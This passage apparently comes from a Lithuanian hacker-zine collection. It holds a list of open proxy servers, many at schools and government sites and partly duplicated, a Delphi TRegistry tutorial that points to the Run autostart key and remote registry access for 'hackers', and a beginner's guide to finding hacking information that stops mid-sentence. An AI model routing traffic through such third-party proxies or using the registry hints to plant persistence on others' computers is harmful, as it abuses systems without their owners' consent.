mcoeftp.marin.k12.ca.us 80
numbers.tvcc.cc.or.us 80
oakweb.oak-web.washington-ch.oh.u 8080
pc103.portage.k12.mi.us 80
proxy1.cdesd.k12.or.us 80
proxy2.prescott.guilford.k12.nc.us 80
thor.ircc.cc.fl.us 80
watcher.state.wy.us 80
proxy1.prescott.guilford.k12.nc.us 80
www.cassvillesd.k12.wi.us 80

-=VE – VENEZUELA=-
proxy.telcel.net.ve 80

-=ZA – SOUTH AFRICA=-
cache.mailnet.co.za 80
ns2.quickvoice.co.za 80
proxy-rnb2.mweb.co.za 80
proxy.cpt.mweb.co.za 80
proxy.pta.mweb.co.za 80

-=ZW – ZIMBABWE=-
proxy.africaonline.co.zw 8080

-=IP – Servers listed by IP=-
12.7.130.33 8080
142.169.242.4 80
164.124.250.226 80
165.138.113.102 8080
165.138.113.221 8080
165.138.113.247 8080
165.138.94.10 8080
165.254.186.2 8080
168.126.72.10 80
12.7.130.33 8080
142.169.242.4 80
164.124.250.226 80
165.138.113.102 8080
165.138.113.221 8080
165.138.113.247 8080
165.138.94.10 8080
165.254.186.2 8080
168.126.72.10 80
168.126.72.12 80
168.126.72.13 80
168.126.72.26 80
168.216.147.130 80
169.133.1.51 80
192.117.238.94 80
193.89.27.199 80
194.133.122.44 8080
194.140.17.130 80
194.213.91.6 80
194.239.178.252 80
194.51.96.231 8080
195.37.223.225 80
195.74.0.28 80
198.161.26.2 80
198.161.26.33 80
198.161.26.65 80
199.172.226.197 8080
200.1.161.59 80
202.235.15.34 8080
202.30.245.3 80
202.39.143.5 80
203.103.174.194 80
203.108.181.62 80
203.144.250.66 80
203.241.162.32 80
203.37.184.60 80
203.41.7.130 80
204.140.188.5 80
204.211.154.142 80
204.211.154.144 80
205.134.211.44 80
208.196.150.4 80
209.121.142.2 80
209.20.42.6 3128
209.5.107.10 80
210.172.76.30 80
210.8.56.1 80
210.96.52.1 80

42. REGISTRAS

Taigi pradedame:

Kaip jus tikriausiai jau zhinote registre visos Windows programos (net ir patys windowsai) ishsaugo savo kaikuriuos parametrus. Tachiau, kaip tos programos juos ishsaugo ???

Taigi shiame darbe ash norechiau aprashyti registro programavimo pagrindus. Stengiausi laikitys atokiau nuo tokio zhargonizmo kaijp joos rashotie laijshkuoze ir pan =:). Stengiausi, kad shis darbas butu kuo daugiau mokslinio pobudzhio.

Disklaimeris: Shi teksta parashiau grynai mokomaisiais tikslais ir neprisiimu jokios atsakomybes, jeigu naudojant shia literatura nors vienas zhmogus patirs moraliniu ar materialiniu nuostoliu.

Shis failas gali buti laisvai platinamas iki tol, kol kartu su juo bus minimas autoriaus vardas, bei jis liks nepakeistas.
Achiu.

Turinys:

1. Registras, jo struktura.
2. Pagrindiniai registro skyriai ( HKEYS ) ir ka jie reishkia.
3. Registro irashu tipai ( String, DWord, Binary ).
4. Pradedame programuoti ( Su Delphi 5 ).
5. Idomesnes registro vientos ( ten kur jus hackeriai galesite pridergti lamoms =:)

1 Registras, jo struktura.

Registras laiko duomenis hierachinio tipo “medyje” (tree). Kiekviena “shakele” medyje yra vadinama “raktu” (key). Kiekvienas toks raktas gali savyje tureti dar po kelis “raktus” arba tureti “irashus” (vadinamus “values”). Kartais netgi vien “rakto” buvimas tam tikroje vietoje yra visa informacija kuria reikia pasiimti programai; kita karta, programa atidaro tam tikra rakta ir pasiima informacija ish irashu esanchiu tame rakte. Vienas raktas gali tureti neribojama kieki irashu, ir irashas gali tureti bet kokia reikshme.

2 Pagrindiniai registro skyriai ( HKEYS ) ir ka jei reishkia.

Turbut pastebejote kaireje registro lango puseje yra 6 didelemis raidemis pavaidnti skyriai ir visi jie prasideda 4 raidemis HKEY_.. na tai patys aukshchiausieji registro hierarchijos skyriai (neiskaitykite My Computer, nes jame nera nieko irashyta). Kiekvienas ish ju turi savo paskirti registr, kiekviename ish ju saugoma tam tikra informacija: viename programos saugo savo nustatymus, kitame sistema (Windows), dar kitame vartotojo nustatymai ir t.t. ir pan.
Taigi chia rashoma, ka kiekvienas skyrius reishkia ir ka jis savyje “saugo”:

HKEY_CLASSES_ROOT: Shiame skyriuje yra saugomi dokumentu tipai (arba klases) ir tu dokumentu savybes susijusios su tu dokumentu tipais. Taip pat nustatymai saugomi shiame skyriuje yra naudojami Windows programu be OLE programu (gal kas nors man parashykite ka tai reishkia).

HKEY_CURRENT_USER: Shiame skyriuje yra saugomi konkretaus vartotojo nustatymai. Shie nustatymai taip pat iskaito ir Windows shell’o kintamuosius, irashus apie programu grupes, splavas, spausdintuvus, tinklo sujungimus, ir programu nustatymus.

HKEY_LOCAL_MACHINE: Shis skyrius saugo fizine kompo bukle, iskaitant duomenis apie kompo magistrale, sistemine atminti, bei instaliuota hardwara ir softwara.

HKEY_USERS: Na shiame skyriuje yra saugoma bendri vartotojo nustatymai, jeigu kompu naudojasi keli zhmones ir atsiranda dar vienas naujas vartotojas.

HKEY_CURRENT_CONFIG: Shitas skyrius yra skirtas saugoti dabartiniam aplinkos sukonfiguravimui ( fontai, interneto nustatymai ir t.t. ir pan.)

HKEY_DYN_DATA: Shitas skyrius saugo tai, ko ash dar neishsiaishkinau =:( sorry.

3. Registro irashu tipai.

STRING: Irashas, kuriame saugoma informacija yra zhodine. Tai gali buti visokie zhodzhiai, keliai (paths) nurodyti iki tam tikru programu ar pagalbiniu failu, kompo pavadinimai, kam registruota programa (!) registracijos numeriai (!!!) ir t.t. ir pan.

BINARY: Irashas, kuriame saugoma informacija yra dvejetainio pavidalo, tai gali buti visokiausi kodai arba nustatymai, kuriems reikia tik dvieju reikshmiu ( 0 ir 1 arba ne ir taip ).

DWORD: Irashas panashus i STRING, tik jame informacija gali buti daug daug ilgesne.

4. Pradedame programuoti.

PASTABA: norintys padaryti ka nors su shiuo komponentu turetu tureti daugiau negu minimalius pagrindus Delphi programavime.

Na rashysiu shi skyriu remdamasis Delphi 5 programavimo kalba. Taigi. norint priversti programa ka nors irashyti i registra reikia zhinoti kokiu komponentu ji naudosis ir kokia komanda sius registrui.
Delphi aplinkoje yra TRegistry komponentas ( yra dar pora: TRegIniFile, TRegistryIniFile, tachiau TRegistry yra universaliausias). Shis komponentas yra nevizualus ir jo nera ne vienoje paleteje, taigi ji reikia isideti kaip kintamaji bei irashyti i USES sarasha. pvz.:

uses

Registry, .;

procedure lameriolauzhimas(Sender: TObject);
var

Reg: TRegistry;
Begin
.

Taig pazhiurime i ji giliau. Kaip ir kievienas Delphi komponentas jis turi savybes (Properties), ju yra penkios, metodus (Methods), kuriu yra labai daug, tachiau neturi “ivykiu” ??? (Events). Kiti , bet ne visi komponentai turi ivykius.
Savybes: Access, CurrentKey, CurrentPath, LazyWrite ir RootKey.

1. Access: shia savybe yra nustatomas priejimo lygis dirbant su registro raktais ir irashais.
Savybes sintakse tokia: TRegistry.Access(). Shtai visi jo parametrai:

KEY_ALL_ACCESS visishko priejimo lygis (parametru KEY_READ, KEY_WRITE ir KEY_CREATE_LINK visuma);

KEY_READ ledzhia tik nuskaityti duomenis ish tam tikro irasho ar rakto;

KEY_WRITE ledzhia tik irashyti i registra naujus raktus ir irashus;

KEY_QUERY_VALUE garantuoja prieima prie bet kokio rakto ( bet ne irasho );

KEY_ENUMERATE_SUB_KEYS shis parametras “suskaichiuoja” registro raktus bei irashus;

KEY_NOTIFY shis parametras pranesha apie raktu bei irashu pasikeitimus;

KEY_SET_VALUE ledzhia sukurti naujus irashus raktuose;

KEY_CREATE_SUB_KEY ledzhia sukuti naujus raktus ( bet ne irashus );

KEY_CREATE_LINK sukuria nuorodas i kitus raktus, irashus ar failus diske;

KEY_EXECUTE apriboja registro raktu bei irashu naudojima iki read-only rezhimo.

Shios savybes tipas yra LongWord;

2. CurrentKey: shia savybe galima nustatyti koks registro raktas yra konkrechiu momentu atidarytas. Demesio, jog operacijos programoje atliekamos su registru paveiks tiktais ta rakta kuris yra tuo momentu atidarytas OpenKey arba OpenKeyReadOnly metodu (apie juos veliau).Shios savybes tipas yra HKEY;
Shiai savybei negalima priskirti jokio reikshmes, bet ja galima panaudoti shtai taip:
Edit1.Text := Reg.CurrentKey;

3. CurrentPath: labai panashy savybe i CurrentKey, tik shiuo atveju jeigu komanda pavyksta, tai grazhintas rezultatas bus ne tik to rakto pavadinimas, bet ir kelias iki jo ( pvz.: HKEY_CURRENT_USERSoftwareMicrosoftWindowsCurrentVersionRun =:). Shios savybes tipas yra STRING;
Kadangi shiai savybei negalima priskirti jokio reikshmes tai ja galima pritaikyti shitaip:
Edit1.Text := Reg.CurrentPath;

4. LazyWrite: na shi savybe yra itin gera, kai jus nenorite atidarineti kitu registro raktu ir padaryti irasha registre reikiamoje vietoje. t.y. jums nereikia atidarineti raktu tiesiog pasakete programai, jog norite tokio irasho tokioje vietoje ir viskas (ankschiau minejau, jog irashus galima daryti tik ten kur yra atidaryti raktai, dabar “tik ten” pakeiskite i “beveik tik ten” =:). Shios savybes tipas yra BOOLEAN (mano megiamiausias, kas taip o kas nea ??? =:).
Sintakse: Reg.LazyWrite := True;

5. RootKey: nurodo kuris aukshchiausias hierarchijos lygis turetu buti atidarytas ( pagal nutylejima: HKEY_CURRENT_USER );
Sintakse: Reg.RootKey := HKEY_CURRENT_USER;

Dabar visi shio komponento metodai (abeceles tvarka):

CloseKey: uzhdaro esamu momentu atidaryta rakta, kai visos reikalingos “proceduros” atliko savo darba su juo.
Sintakse: Reg.CloseKey;

Create: pats svarbiausias metodas. Sukuria pati TRegistry komponenta programoje. Pradines savybes bei parametrai buna shie:
RootKey := HKEY_CURRENT_USER (kaip ir pagal nutylejima), LazyWrite := True, dar galima nurodyti AAccess parametra, kuris bus priskiriamas Access savybei, pagal nutylejima jis yra KEY_ALL_ACCESS.
Sintakse: Reg.Create(AAccess); //parametro AAccess gali ir nebuti

CreateKey: sukuria nauja rakta. Shio rakto struktura gali buti absoliuti ir releatyvi. Skirtumas: absoliutus rakto vardas prasideda backslachu “” ir yra pradedamas kurti nuo TRegistry.RootKey reikshmes, o releatyvus yra pradedamas kurti nuo konkrechiu momentu atidaryto rakto.
Sintakse: Reg.CreateKey(rakto_vardas);

DeleteKey: ishtrina nurodyta rakta. PASTABA: Windows95 operaciineje sistemoje DeletKey metodas ishtrina visus raktus esanchius tame rakte (jeigu supratote tai gerai), o WindowsNT 4.0 OS tai kiekvienam raktui reikia kviesti atskira DeleteKey metoda (tas turbut labai uzhknistu).
Sintakse: Reg.DeleteKey(rakto_vardas);

DeleteValue: ishtrina nurodyta irasha (bet ne rakta).
Sintakse: Reg.DeleteValue(irasho_vardas).

Destroy: labai jau zhiaurus metodas. Uzhdaro konkretu rakta ir sunaikina TRegistry komponenta programoje ishlaisvindamas atminti, kuri buvo skirta TRegistry komponentui programoje.
Sintakse: Reg.Destroy; (jau girdzhiu laidotuviu marsha – cirkas baigesi =:).

GetDataInfo: gauna irasho (!) registre informacija.
Sintakse: Reg.GetDataInfo(irasho_vardas,irasho tipas{deja ji turesite irashyti patys});
Kadangi shiuo metodu jus tikrinsite registro irasho tipa, tai grazhintas rezultatas yra arba True arba False;
Galimi tipai:

rdUnknown: nezhinomas registro irahso tipas;

rdString: registro irashas yra papraschiausias ANSI irashas.

rdExpandString: registro irashas yra taip pat ANSI tipo. Shis tipas saugo WinShell’o kintamuosius arba nuorodas i kitu registro irashus arba WinShell’o failus.

rdInteger: irashas yra papraschiausias 32bit skaichius.

rdBinary: irashe saugoma informacija yra dvejetainiame pavidale (10011100020MB100011010101010 =:)

GetDataSize: nustato irasho dydi baitais atidarytame rakte. Jeigu shi operacija pavyksta, tai funkcija parodo irasho dydi baitais, jeigu ne tai parodytas skaichius yra -1.
Sintakse: Reg.GetDataSize(irasho_vardas).

GetDataType: o chia tai metodas (!). Parodo irasho tipa (jums jau nebereikes nustatineti jo su GetDataInfo metodu) konkrechiu momentu atidarytame rakte. Irasho tipai tokie patys kaip ir GetDataInfo metode.
Sintakse: Reg.GetDataType(irasho_vardas).

PASTABA: Prie visu Delphi tipu esanchiu kodo pradchioje reikia nurodyti TRegDataType parametrus:
type TRegsDataType= (rdUnknown, rdString, rdExpandString, rdInteger, rdBinary);

GetKeyInfo: pateikia informacija apie konkretu atidaryta rakta. Kaip ir GetDataType kodo pradzhioje reikes irashyti TGetKeyInfo parametrus:
type

TRegKeyInfo = record

NumSubKeys: Integer;

MaxSubKeyLen: Integer;

NumValues: Integer;

MaxValueLen: Integer;

MaxDataLen: Integer;

FileTime: TFileTime;

end;

Funkcijos sintakse tokia: Reg.GetKeyInfo(norimas_parametras);

Shio metodo parametrai:

NumSubKeys: nurodo raktu skaichiu esanchiu atidarytame rakte;
MaxSubKeyLen: ilgiausia rakto varda simboliais;
NumValues: irashu skaichius;
MaxValuelen: ilgiausio irasho vardas;
MaxDataLen: ilgiausia irasho reikshme;
FileTime: laikas, kai paskutini karta buvo rashoma i nagrinejamaji rakta;

Jeigu shi funkcija nepavyksta, tai visoms reikshmems suteikiama reikshme lygi 0.

GetKeyNames: pateikia sarasha visu raktu esanchiu nurodytame rakte. Sarashas pateikiamas TStrings tipo kintamaisiais (t.y. jus neikishite shito sarasho i TListBox komponenta).
Sintakse: Reg.GetKeyNames(vieta_kur_parodyti_sarasha);

GetValueNames: labai panashi i GetKeyNames metoda, bet shi funkcija pateikia irashu sarasha. Sarashas taip pat pateikiamas TStrings tipo kintamaisiais.
Sintakse: Reg.GetValueNames(vieta_kur_parodyti_sarasha);

HasSubKeys: nustato ar konkretus raktas turi raktu savyje.
Sintakse: Reg.HasSubKeys := True; //shio metodo paramtero tipas yra BOOLEAN

KeyExists: nustato ar nurodytas raktas egzistuoja.
Sintakse: Reg.KeyExists := True; //tipas – BOOLEAN

LoadKey: sukuria nauja rakta po vienu ish aukshchiausiu raktu ir uzhkrauna i ji informacija ish nurodyto failo.
Sintakse: Reg.LoadKey(rakto_pavadinimas, failo_vardas);

PASTABA: priesh naudojant shi metoda RootKey turi buti priskirtas HKEY_USERS arb HKEY_LOCAL_MACHINE.

MoveKey: perkelia visus rakto porakchius bei irashus i kita vieta suteikiant jam nauja varda, beje reikia nurodyti dar ar reikia senaji rakta ishtrinti ar nea.
Sintakse: Reg.MoveKey(senas_rakto_vardas, naujas_rakto_vardas, ishtrinti(true arba false));

Po kopijavimo ar perkelimo naujasis raktas yra uzhdaromas. Po Windows NT kiekvienas rakto poraktis turi buti atskirai nukopijuotas arba perkeltas.

OpenKey: atidaro nurodyta rakta.
Sintakse: Reg.OpenKey(rakto_vardas, sukurti(true arba false));

Gali buti atveju, kad nurodytas raktas neegzistuos, tada “sukurti” parametro vietoje irashysime true.
Jeigu mes norime atidaryti rakta nustatymu nuskaitymui programoje, tai naudosime “sukurti” parametra false reikshme, nes mes jug nenoresime per nauja shi rakta sukurti.

OpenKeyReadOnly: atidaro nurodyta rakta vien skaitymui (!). Atidaryto rakto saugumo lygis bus KEY_READ.
Sintakse: Reg.OpenKeyReadOnly(rakto_vardas);

ReadBinaryData: nuskaito dvejetaine informacija ish nurodyto irasho.

Sintakse: Reg.ReadBinaryData(irasho_vardas, kintamasis, buferio_dydis);
Chia kintamasis yra programos kintamasis, kuriam reikes priskirti gauta reikshme, buferio_dydis yra skaichius, kuris nurodo atminties dydi baitais, kurioje bus laikoma “ishtraukta” informacija.

ReadBool: nuskaito logine informacija ish nurodyto irasho.

Sintakse: Reg.ReadBool(irasho_vardas);
Jeigu funkcija sekminga, tai jus gaunate reikalinga informacija ish registro, jeigu nea, tai jus gaunate praneshima apie klaida.

ReadCurrency: na nebijokite, tai tikrai nevaliuta, bet ash pac dar neishsiaishkinau, kad chia per metodas sorry.

ReadDate: nuskaito data ish nurodyto irasho.

Sintakse: Reg.ReadDate(irasho_vardas);
Naudokite shi metoda, tada, kai i irasha irashete reikshme su WriteDate procedure(apie tai veliau). Jeigu irashas nesaugo savyje reikshmes “panashios” i data, tai tada yra parodomas praneshimas apie klaida.

ReadDateTime: panashi i ReadDate, tik be datos ji dar nuskaito ir laika. Salygos tokios pachio sintakse tokia pati.

ReadFloat: nuskaito slankaus kablelio skaichiu. Jeigu irashas neturi savyje tokio skaichiaus yra parodomas praneshimas apie klaida.
Sintakse: Reg.ReadFloat(irasho_vardas);

ReadInteger: nuskaito skaichiu Integer tipo. Salygos bei sintakse tokia pati kaip ir pas ReadFloat.

ReadString: nuskaito simbolius (zhodzhius) ish nurodyto irasho. Shis metodas tinka tada, kai irashas buvo padarytas WriteString arba WriteExpandString metodu (apie juos veliau).
Sintakse: Reg.ReadString(irasho_vardas);

ReadTime: nuskaito laika ish registro irasho. Naudokite shi metoda tik tada, kai irasha padarete WriteTime metodu (apie ji veliau).
Sintakse: Reg.ReadTime(irasho_vardas);

RegistryConnect: kvepia hackinimu. Taip ir yra. Shi komanda prisijungia prie kito kompo registro.
Sintakse: Reg.Registry.Connect(//kompo_vardas);

PASTABA: priesh naudojantis shiuo metodu reikia RootKey savybe priskirti prei HKEY_USER arba HKEY_LOCAL_MACHINE.

RenameValue: shis metodas pakeichia irashui priskirta reikshme i nauja.
Sintakse: Reg.RenameValue(sena_reikshme, nauja_reikshme)
PASTABA, jeigu jus pervardinsite viena irasho tipa i kita, tai jums nebus jokio ispejimo ir jis bus pakeistas (!).

ReplaceKey: pakeichia vien rakta kitu ish naujo failo, senaji irashydamas i kita faila.
Sintakse: Reg.ReplaceKey(rakto_vardas, failas_i_kuri_bus_perrashytas_raktas, failas_ish_kurio_bus_irashytas_naujas_raktas);

SVARBI PASTABA: failas_i_kuri_bus_perrashytas_raktas turi buti padarytas su metodu SaveKey, kurio sintakse yra sekanti:
Reg.SaveKey(rakto_vardas, failo_pavadinimas_su_reg_pletiniu);
Taigi bendra ReplaceKey sintakse butu kazhkas panashaus i:
Reg.Replacekey(rakto_vardas,SaveKey(rakto_vardas,failo_pavadinimas_su_reg_pletiniu),failas_ish_kurio_bus_irashytas_naujas_raktas);

RestoreKey: metodas kuris atkuria rakta ish failo ankschiau sukurto su SaveKey metodu.
Bendra sintakse: Reg.RestoreKey(rakto_vardas, SaveKey(failas_ish_kurio_bus_atgamintas_raktas));

SaveKey: na jau anskchiau minejau, kad tai metodas, kurio yra atidaromas vienas ish raktu ir ishsaugomas i konkretu faila su pletiniu *.reg.

UnLoadKey: ishkrauna viena ar kita rakta ish registro nemodifikuodamas failo (jeigu toks yra) ish kurio tas raktas buvo uzhkrautas LoadKey metodu. Priesh naudojant shia funkcija RootKey savybe turi buti nustatyta i HKEY_USERS arba HKEY_LOCAL_MACHINE.
Sintakse: Reg.UnLoadKey(rakto_vardas);

ValueExists: tikrina ar nurodytas irashas egzistuoja registre. Tipas BOOLEAN.
Sintakse: Reg.ValueExists(irasho_vardas);

WriteBinaryData: padaro irasha nurodytu vardu dvejetainio tipo. T.y. jame saugoma informacija yra dvejetainiame pavidale.
Sintakse: Reg.WriteBinaryData(irasho_vardas, kintamasis, buferio_dydis);
Visi kiti parametrai(kintamasis, buferio dydis) yra apzhvelgiami metode ReadBinaryData.

WriteBool: padaro irasha nurodytu vardu loginio tipo (True, False), nors i registre irashas yra padaromas kaip dvejetainio tipo. Jeigu shi funkcija nepavyksta jokie irashai nera padaromi registre ir yra parodomas praneshimas apie klaida.
Sintakse: Reg.WriteBool(irasho_vardas, true/false);

WriteCurrency: nu jug sakiau, kad nezhinau ka reishkia ReadCurrency, tai nezhinau ka reishkia ir shitas metodas.

WriteDate: padaro irasha, kurio reikshme yra data.
Sintakse: Reg.WriteDate(irasho_vardas, reikshme);
Reikshme yra TDateTime tipo kintamasis. Galimos kintamojo reikshmes:
0 – laikas bus pradetas skaichiuoti nuo 1899 12 30 12:00 vidurdieni.
2.75 – laikas bus pradetas skaichiuoti nuo 1900 01 01 6:00 vakare.
-1.25 – laikas bus pradetas skaichiuoti nuo 1899 12 29 6:00 ryte.
35065 – laikas bus pradetas skaichiuoti nuo 1996 01 01 12:00.

WriteDateTime: padaro irasha, kurio reikshme yra laikas.
Sintakse: Reg.WriteDateTime(irasho_vardas, reikshme);
Reikshme yra TDateTime tipo kintamasis. Kintamojo reikshmes yra tokios pachios tiktais shiuo atveju procedura data irasho ir laika ir data.

WriteExpandString: padaro irasha kuris nukreipia i kitus sistemos kintamuosius, failus arba registro irashus.
Sintakse: Reg.WriteExpandString(irasho_vardas, reikshme);
Reikshme chia yra paprastas “kelias” iki vieno ar kito kintamojo ar failo sistemoje ir pan.

WriteFloat: padaro irasha su slankaus kablelio skaichiumi. Tokiu pvz kaip pi:=3.1415296 arba 1 inch := 2.54 cm ir t.t. ir pan.
Sintakse: Reg.WriteFloat(irasho_vardas, reikshme);
Reikshme yra skaichius kuri jus norite irashyti. Shi irasha jus veliau galite “nuskaityti” su ReadFloat metodu.

WriteInteger: padaro irasha su sveikuoju skaichiumi. Shi irasha jus veliau galite “nuskaityti” su ReadInteger metodu.
Sintakse: Reg.WriteInteger(irasho_vardas, reishme);
Reikshme – jusu norimas skaichius.

WriteString: padaro irasha su simbliu reikshme (zhodzhiais). Shi irasha jus veliau galite “nuskaityti” su ReadInteger metodu.
Sintakse: Reg.WriteString(irasho_vardas, reikshme);
Na nebeaishkinsiu ka reishkia reikshme =:).

WriteTime: padaro irasha, kurio reikshme yra laikas. Viskas tas pats kaip ir WriteDate ar WriteDateTime, tik dabar jum padarys irasha, kuriame yra tik (!) data.

Shtai visi TRegistry komponento metodai bei savybes. Ash nenorejau jums rashyti “paspausk chia, rashyk taip”. Ash jums trumpai apibudinau kiekviena savybe bei metoda, tikiuosi su jais zhinosite ka daryti ir padarysite keliu savybiu bei metodu “mirtina jungini” =:).

5. Idomiausios vietos registre:

HKEY_CURRENT_USERSoftwareMicrosoftNotepad
HKEY_CURRENT_USERSoftwareMicrosoftTelnet
HKEY_CURRENT_USERSoftwareMicrosoftWindowsCurrentVersionExplorerFileExts (visi failu pletiniai ir su kuo jie turetu buti atidaromi)
HKEY_CURRENT_USERSoftwareMicrosoftWindowsCurrentVersionExplorerShell Folders (windozu katalogu tokiu kaip Favorites Templates Startup ir t.t. keliai (paths) windozu kataloge =:)~ skanu.
HKEY_CURRENT_USERSoftwareMicrosoftWindowsCurrentVersionExplorerUser Shell Folders (vartotojo shell katalogai).
HKEY_CURRENT_USERSoftwareMicrosoftWindowsCurrentVersionGrpConvMapGroups (kazhkas panashaus i Startmenu katalogus bei taskbar quick launch konfiguracija)
HKEY_CURRENT_USERSoftwareMicrosoftWindowsCurrentVersionInternet SettingsZones (viskas kas susije su Desktop ikonomis tokiomis kaip My Computer, NetWork neighborhood ir pan.
HKEY_LOCAL_MACHINESOFTWARECLASSESCLSID{645FF040-5081-101B-9F08-00AA002F954E} (chia galite pakeisti savo shiukshliu dezhes pavadinima ir apibudinima).

6. Naudota literatura: Delphi 5 help failas. Registra ishnarshiau pats.

Tikiuosi patiks.

Sekantis planuojamas darbas turetu buti apie komponentu rashyma (taip par Delphi aplinkoje).

Bloody yours 20MB1 =:)

43. KUR PRADEDANCZIAJAM HACKERIUI IESKOTI INFO?

REM: Shis textas skirtas pradedantiesiems ir naujokams technologiniame
pogrindyje. Todel, please, j00s, visi kieti s00per 31337 hackeriai
lameriais?’, etc. 🙂
Visi mes kazhkada tokiais buvome. Juk reikia nuo kazhko pradeti 🙂

H/P kanaluose IRC, mailing-list’uose ir newsgroup’uose gan dazhnai tenka
matyti pradedancziuju ir wannabe hackeriu klausimus tipo “Kaip tapti
hackeriu?”, “Kaip isilauzhti i sistema?”, etc. Ir jeigu tokiu klausimu
autorius nera ishjuokiamas (kas dazhniausiai ir atsitinka), tai
vienintelis atsakymas, kurio jis gali susilaukti – “RTFM!”

Tiems, kas nesupranta paaishkinsiu: RTFM – tai anglishkos frazes
‘Read The Fuckin’ Manual’ sutrumpinimas. Taigi, lietuvishkai tai skambetu
mazhdaug ‘Skaityk !@#$%^ instrukcija!’.
Bet kur, po velniu, tas instrukcijas gauti?

Vienas ish hackeriu etikos teiginiu skelbia – neprashyk kitu tokios
informacijos, kuria pats gali susirasti. Taigi, netgi jeigu jums vis delto
pasiseke ir kazhkas ish hackeriu nutare jums padeti – jis greicziausia
pasufleruos, kur ieshkoti informacijos, bet visa kita jums teks daryti
patiems: dirbkite savo galva, mastykite, darykite ishvadas.
O shiame tekstuke ash pameginau apibendrinti, kaip ir kur jums susirasti
tai, ko ieshkote.

Visu pirma – heh, mokykites kalbu. Jeigu be gimtosios lietuviu galite
laisvai (na beveik :] ) skaityti anglishkai ir rusishkai – jau turite
visus shansus susirasti faktishkai bet kokia info, nes, kaip zhinote,
Interneto kalba yra anglu, o dauguma specializuotu kompiuteriniu knygu
musu knyginuose yra rusu kalba.

Pirkite rimtas knygas apie kompiuterius: operaciniu sistemu, protokolu,
programavimo kalbu aprashymus, zhinynus, vadovelius, knygas, susijusias su
kompiuteriu saugumu. Ishsiaishkinkite kur jusu mieste yra technines
literaturos knygynas (Kaune siulycziau uzheiti i Smaltijos knygyna Kestucio
gatveje prieshais Raudonojo Kryzhiaus ligonine; Vilniuje – Penkiu
Kontinentu knygyna ir kt.) ir pinigus, kuriuos paprastai praoshiate
savaitgalio fiestose investuokite i geras knygas. SKAITYKITE nupirktas
knygas – shiaip skaitymas atima gana daug laiko, bet, pasistengus, laiko
skaitymui galima surasti – skaitykite troleibuse, automobilyje pakliuve i
kamshti, laukdami priemimo pas daktara ar kirpykloje, guledami vonioje
(heh) ar netgi per pamokas ar paskaitas (kai kurios ju ishtikruju
nobodzhios, ar ne?). Taigi, RTFM!

Nueikite i Technikos biblioteka arba i vieshaja biblioteka ir panarshykite
kataloga kompiuterinem temom: kompiuteriai, informatika, informacijos
saugumas, programavimo kalbos, informacines technologijos,
telekomunikacijos, etc. RTFM!

Knygos yra gerai, bet jos turi viena esmini trukuma – geros knygos apie
kompiuterius kainuoja nemazhus pinigus (pazhistu zhmoniu, kurie
ishleidzhia knygoms po 300 – 400 Lt per menesi) Tuo tarpu, beveik visa
jums reikalinga informacija galima gauti nemokamai – taip, teisingai, ish
Interneto.

Lengviausiais budas – pasitelkti i pagalba paieshkos stotis (search
Web’a, kitos – newsgroup’u
archyvus, kur saugoma viskas, kas buvo ten postinta per kelis metus. Taip
pat Internete saugomi geriausiu hackeriu maillist’u archyvai.

Naudojantis paieshkos stotimis yra du svarbus dalykai, i kuriuos reiktu
atkreipti demesi: kokia paieshkos stotimi naudotis, ir kokia paieshkos
taktika remtis.

Mano asmenine nuomone, geriausios paieshkos stotys yra dvi: Web’ui –
Altavista (http://altavista.digital.com arba http://www.av.com), o
newsgroup’ams – Dejanews (http://www.dejanews.com), bet jus galite
ishsirinkti sau patogiausia paieshkos stoti: linkus i beveik visas galite
rasti adresu http://sgk.tiac.net/search/

Bet kaip efektyviausiai pasinaudoti paieshkus stocziu siuloma paslauga?
Tiesog ivedus i paieshkos lauka zhodi “hacker” ar netgi “how to hack” jus
gausite brashkilijonus nuorodu i webo puslapius, kur rasite pretenzinga
grafika su kaukolem ir liepsnom, vargonu muzika bei su gramatinem klaidom
parashytus teiginius “Ash, ble, kietaz haxoriuz, taigi joos lamai, turite
bucziuoti man su@ine, nes ash esu pi%$dec ELITAS!” ir kruvom nuorodu i
tokius pat puslapius. Tacziau juose kazhkaip nelebai yra naudingos
informacijos. Heh, sveiki atvyke i wanabe-hackeriu pasauli 😉

Taigi, pirmoji taisykle – sukonkretinkite savo paieshka. Rashykite ne “how
to hack”, bet kazhka panashaus i “password attacks over NetBIOS”
Antra – naudokite “advanced search” opcija, kuri leistu naudoti
matematines logikos taisykles paieshkos sukonkretinimui. (Matematines
logikos funkcijos “and”-ir, “or”-arba “not”-ne pades zhymiai susiaurinti
paieshkos rezultatus atsizhvelgiant i jusu poreikius. Smulkiau apie
matematines logikos funkcijas pasiskaitykite vadovelyje, o czia ash tik
trumpai apzhvelgsiu ju panaudojima paieshkai.)
“And” funkcija duos tik tuos rezultatus, kurie atitinka VISUS jusu
uzhklausimo zhodzhius. Shi funkcija tapati opcijai “all”.
“Or” – visus kurie atitinka BENT VIENA uzhklausimo zhodi. Shi funkcija
tapati opcijai “any”.
“Not” – rezultatai, kurie atitinka shioje skilty irashyta uzhklausima bus
ignoruojami.

Be paieshkos stocziu yra dar vienas geras budas rasti geras vieteles
Internete: aptikus gera saita, tiesiog sekti ten esancziais linkais
(nuorodom), ir jums nereikes patiems knistis po tukstanczius paieshkos
stocziu ishmestu rezultatu, nes kazhkas galbut jau padare tai uzh jus.
Keletas pavyzdzhiu:
anglishkai (tik keli ish daaaugelio pvz.):
http://www.cert.org
http://www.silitoad.org
http://www.rootshell.com
rusishkai:
http://www.hackzone.ru (geriausias hack’ saitas rusu kalba)
lietuvishkai:
http://www.pogrindis.net (heh)

Vienas asmeninis patarimas: narshydami puslapius ishjunkite visas
multimedia opcijas savo browseryje, arba naudokite txt-only browserius
tipo Lynx. Jums juk reikia INFORMACIJOS, ir jus nenorite gaishti laiko,
kol krausis visi tie JPG su kaukolem ir animuotom liepsnom backgrounde 🙂
bei shustros muzikeles.

Taigi, rimtuose H/P puslapiuose jus galesite rasti textuku, krie yra
parashyti hackeriu ir dazhnai buna labai informatyvus. Ypacz vadinamieji
FAQ (Frequently Asked Questions) – Dazhniausia Uzhduodami Klausimai (ir
atsakymai). Tacziau, tushczias textu kolekcionavimas neduos jokios naudos.
Skaitykite juos. RTFM!

Na o kaip gi del manual’u? Juk tam, kad ‘..isilauzhti i sistema’ jums,
visu pirma reikia tureti nebloga zhiniu bagazha apie tai, kaip tos
sistemos veikia, apie protokolus ir tinklus, etc.

GERIAUSIAS, taip, geriausias shaltinis shiuo atzhvilgiu yra RFC.
RFC reishkia “Request for Comment” – “Uzhklausimas komentarui”. Shis
pavadinimas kiles dar ish tu laiku, kai kompiutriu tinklai buvo kudikystes
